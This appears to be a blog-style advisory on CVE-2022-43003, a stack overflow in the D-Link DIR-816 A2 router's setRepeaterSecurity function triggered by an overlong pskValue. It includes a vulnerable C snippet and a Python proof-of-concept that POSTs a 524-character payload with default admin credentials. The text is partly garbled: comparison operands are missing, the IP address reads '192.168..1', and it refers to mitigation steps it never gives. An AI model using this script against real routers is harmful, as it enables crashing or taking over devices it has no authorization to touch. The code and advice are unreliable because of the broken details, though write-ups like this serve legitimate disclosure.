CVE-2022-43003: D-Link DIR-816 A2 1.10 B05 Stack Overflow Vulnerability, Exploiting the pskValue parameter in setRepeaterSecurity Function

In today's highly connected world, the security of our networking devices has become a major concern. The D-Link DIR-816 router is a widely used device known for its robust security features and efficient performance. However, a critical vulnerability, identified as CVE-2022-43003, has been discovered in D-Link DIR-816 A2 1.10 B05 firmware, which can potentially compromise the security of the entire network.

Vulnerability Details

The CVE-2022-43003 vulnerability in the D-Link DIR-816 A2 1.10 B05 firmware stems from a stack overflow caused by the pskValue parameter in the setRepeaterSecurity function. The issue occurs when the device receives a malicious HTTP POST request containing an excessively long value for the "pskValue". This can lead to arbitrary code execution on the device, granting an attacker unauthorized access to not only the router's settings and credentials but also potentially other network-connected devices.

The initial discovery and reporting of the vulnerability can be traced back to these sources

1. D-Link DIR-816 A2 1.10 B05 Stack Overflow by Ezequiel Fernandez - This article explains the original discovery and a detailed description of the vulnerability.
2. NIST NVD CVE-2022-43003 - NIST's National Vulnerability Database provides additional information about this vulnerability.

Below is a code snippet demonstrating the vulnerable section of setRepeaterSecurity function

int setRepeaterSecurity(struct http_request_t *req)
{
  char v1;
  char v2[64];
  char s[512];

  [...]

  // Vulnerable section
  if (safe_strcmp(v2, "wpa-personal") ==  || safe_strcmp(v2, "wpa2-personal") ==  ||
      safe_strcmp(v2, "wpa-auto-personal") ==  )
  {
    strcpy(s, req_get(req, "pskValue")); // stack overflow occurs here
  }

  [...]

  return result;
}

Exploit Details

To exploit this vulnerability, an attacker needs to send a maliciously crafted HTTP POST request to the router's web interface. A sample Python script to exploit the vulnerability can be found in the original exploit article:

import requests

url = 'http://192.168..1';
postData = {
  "nextLink": "wizard.htm",
  "ssid": "ssidname",
  "security_type": "wpa2-personal",
  "psk_cipher_type": "CCMP",
  "pskValue": "A" * 524  # Sending overflow payload
}

requests.post(url, data=postData, auth=("Admin", ""))

The sample script sends an HTTP POST request to the router's IP address (by default, "192.168..1") with a payload containing an excessively long "pskValue" (524 characters). This will trigger a stack overflow when the vulnerable setRepeaterSecurity function processes the request.

Conclusion

CVE-2022-43003 represents a critical vulnerability in the D-Link DIR-816 A2 1.10 B05 firmware. As we await the release of a patch to address this issue, it is essential for users of this device to remain vigilant and follow the recommended mitigation steps to maintain the security and integrity of their networks.

Timeline

Published on: 10/26/2022 19:15:00 UTC
Last modified on: 10/28/2022 14:46:00 UTC